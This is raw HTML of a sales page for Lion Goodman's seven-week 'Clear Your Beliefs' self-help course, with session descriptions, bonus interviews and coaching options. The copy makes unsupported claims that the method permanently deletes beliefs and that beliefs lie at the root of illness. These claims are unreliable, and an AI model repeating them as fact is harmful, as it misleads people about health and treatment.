/>\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong></p>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" 